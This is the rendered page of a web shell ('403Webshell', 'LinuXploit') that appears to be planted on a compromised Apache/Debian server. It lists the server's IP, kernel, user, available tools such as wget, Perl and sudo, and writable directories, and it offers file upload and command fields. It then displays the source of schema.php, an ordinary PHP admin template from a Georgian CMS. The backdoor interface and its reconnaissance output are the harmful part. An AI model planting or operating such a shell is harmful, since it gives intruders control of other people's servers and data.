403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.188
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli_new/admin/view/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/kharagauli_new/admin/view/templates/schema.php
<?php
/*
@author suxoza <suxoza@gmail.com>
*/
header("Content-type: text/html; Charset=utf-8");
  session_start();
   mb_internal_encoding("UTF-8");
    error_reporting(E_ALL);
     date_default_timezone_set("Asia/Tbilisi");
     
     require_once '../../clases/Exception.php';
    set_include_path(
        get_include_path()
        .PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT'].'/clases'
         .PATH_SEPARATOR.str_replace('/admin','',$_SERVER['DOCUMENT_ROOT']).'/Smarty'
        .PATH_SEPARATOR.str_replace('/admin','',$_SERVER['DOCUMENT_ROOT']).'/cls'
    );

    function class_loader($class){
        require_once $class.'.php';
    }

    spl_autoload_register('class_loader');
     
     $_ = new Central;
     
   
//     $mas = [
//         'structure' => [ 
//              'name'   => ['ზედა მენიუ','ქვედა მენიუ','მენიუ ცენტრში','სლაიდი','header ბლოკი','footer ბლოკი'],
//              'params' => ['_top_menu_','_bottom_menu_','_center_menu_','_slide_block','_header_block_','_footer_block_']
//         ]    
//     ];
//     echo Central::_json_encode($mas);
     
     try{
         $manifest = $_->_dir.'templates/'.$_->_default_theme['name'].'/manifest.json';
         if(!file_exists($manifest))throw new Module_not_found('თემის მანიფესტ ფაილი ვერ მოიძებნა');
         $manifest = file_get_contents($manifest);
         if(!$manifest)throw new Module_not_found('თემის მანიფესტ ფაილი არ შეილება იყოს ცარიელი');
         $manifest = json_decode($manifest);
         if(json_last_error() || !isset($manifest->structure))throw new Module_not_found('თემის მანიფესტ ფაილი შეიცავს შეცდომებს');
        // $_->pre($manifest->structure);
     }catch(Module_not_found $ex){
         echo $manifest;
         die($ex->getMessage());
     }
     
     
//     $height_ = $_GET['height']/2+$_GET['height']/3;
//     $width_  = $_GET['width']/2+$_GET['width']/3;
     
     $language = $_->_lang;
     $_ID = isset($_GET['id'])?(int)trim(strip_tags($_GET['id'])):'';
     $select = $_->select("attributes","menu","small",["id",$_ID]);
     if(strlen($select) > 10){
         $select = json_decode($select);
     }
    
    $url = "http://kharagauli";
    

    ?>
<!--<iframe id="scheme" width="100%" height="100%" src="<?=$url;?>" frameborder="0" allowfullscreen=""></iframe>-->
<!--<script src="../../js/live1.js"></script>
<body>
<script>

var xx = document.createElement('iframe');
xx.src = '<?=$url;?>';
xx.width = "100%";
xx.height = "100%";
xx.frameborder = 0;
var dd = document.createElement('div');

document.body.appendChild(xx);
xx.onload = function(){
    alert(this.src);
   var y = (this.contentWindow || this.contentDocument);
   if (y.document)y = y.document;
   y.body.style.backgroundColor="red";
}
// var x = document.getElementById("scheme");
//var y = (x.contentWindow || x.contentDocument);
//if (y.document)y = y.document;
//y.body.style.backgroundColor="red";

</script>
</body>-->

<html>
   <head>
      <title>Adding Dynamic Contents to IFrames</title>
 

      <script type="text/javascript">
          function IFrame(parentElement){
               var iframe = document.createElement("iframe");
                iframe.src='<?=$url;?>';
                iframe.width = "100%";
                iframe.height = "100%";
                iframe.frameborder = 0;
               if(parentElement == null)
                  parentElement = document.body;
               parentElement.appendChild(iframe);
               iframe.doc = null;
               if(iframe.contentDocument)
                  iframe.doc = iframe.contentDocument;
               else if(iframe.contentWindow)
                  iframe.doc = iframe.contentWindow.document;
               else if(iframe.document)
                  iframe.doc = iframe.document;
               if(iframe.doc == null)
                  throw "Document not found, append the parent element to the DOM before creating the IFrame";

               return iframe;
            }
         function onPageLoad(){
            var canvas = document.getElementById("canvas");
            var iframe = new IFrame(canvas);
            iframe.onload = function(){
                var divs = iframe.doc.body;
                divs.style.background = "red";
//                var div = iframe.doc.createElement("div");
//                div.style.width = "500px"; 
//                div.style.height = "500px";
//                div.style.border = "solid 1px #red";
//                div.innerHTML = "saxli saxli saxli<script>alert(1);</\script>";
//                iframe.doc.body.appendChild(div);
//                alert(1);
            };

         }
      </script>
   </head>
 
   <body onload="onPageLoad();">
      <div id="canvas" style="border: solid 1px #000000; height: 1000px; width: 100%"></div>
   </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit